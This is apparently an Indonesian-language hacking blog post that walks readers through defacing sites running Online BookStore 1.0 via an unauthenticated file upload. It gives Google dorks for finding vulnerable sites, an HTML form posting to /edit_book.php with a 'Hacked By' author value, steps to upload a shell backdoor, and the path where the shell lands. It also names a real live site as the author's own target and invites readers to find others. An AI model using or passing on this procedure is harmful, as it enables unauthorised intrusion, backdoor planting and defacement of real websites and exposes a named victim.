Ad Unit (Iklan) BIG

Deface Online BookStore 1.0 Unauthenticated Arbitrary File Upload

3 comments

-

Hai sobat

Saya ikal,

Disini saya akan sharing sesuatu nih.

-


Sesuai judulnya, kita akan bahas, ya sesuai dengan yang dijudul sih :D. Sebenernya ini poc sudah saya temuin saat februari 2020, ya sudah lumayan lama sih. Namun saat saya melakukan traveling di exploit-db.com saya ketemu lagi dengan exploit ini :D.


Ya sudahlah, mari kita langsung masuk kedalam pembahasan.


Bahan : 

- Google Dork : 

inurl:/book.php?bookisbn=

inurl:/bookPerPub.php?pubid=

inurl:/books.php "Full Catalogs of Books"

- Shell Backdoor

- Exploit : /edit_book.php

- Csrf


<form method="post" action="localhost/edit_book.php" enctype="multipart/form-data">

<td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td>

<td><input type="text" name="author" value="Hacked By DragonXploiter | Haikal Ganteng" required></td>

<td><input type="file" name="image"></td>

    <input type="submit" name="save_change" value="Change" class="btn btn-primary">

</form>


 Sedikit rumit :D. Yasudahlah. Let's exploit. Disini seperti biasa, saya sudah mempunyai live target. Yaitu https://malawibookstore.emphxtech.com/


Saya anggap kalian sudah memiliki target juga, Ngoahaha :D. Lalu cek vuln atau tidak nya dengan masukan /edit_book.php dibagian url target kalian masing - masing. 

Contoh : 

https://localhost/edit_book.php

Atau

https://localhost/[path]/edit_book.php


Jika muncul

Something wrong!

Bisa dipastikan target kalian vuln!.


1). Create Csrf with HTML extensi

Salin code csrf diatas lalu buka code editor kalian masing - masing dan tempelkan code csrf tadi (Saya menggunakan Anwriter). Hapus bagian localhost lalu ganti dengan url target kalian, Use HTTP/HTTPS or no, no problem. lalu save dengan nama file HaikalGanteng.html



2). Akses file

Pergi ke pengelola file HandPhone mu, lalu klik file dengan nama HaikalGanteng.html



Lalu buka file tersebut di Browser masing - masing. Dan otomatis jika sudah, tampilannya akan seperti dibawah ini.



Bagian yang kotak ada tulisan angka dan tulisan Hacked By jangan diubah jika tidak ingin error :D. Lalu dibagian form upload, kalian pilih shell backdoor yang ingin kalian upload. Lalu klik Change.


Jika diarahakan ke /index.php Itu artinya shell berhasil terupload :D.


3). Akses shell backdoor

Akses shell backdoornya di path /bootstrap/img/YOURNAMESHELL.php

Contoh : 

https://localhost/bootstrap/img/shell.php

Atau

https://localhost/[path]/bootstrap/img/shell.php



Nah sampai sini saja pembahasannya, karena saya pikir yang saya jelaskan sudah cukup detail :D. 


Referensi : https://www.exploit-db.com/exploits/47887


Dan Juga jika ada yang kurang atau salah kata, biarkan saja.

Thanks

See U

Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.

Related Posts

3 comments

Post a Comment

Dapatkan Notifikasi Dengan Email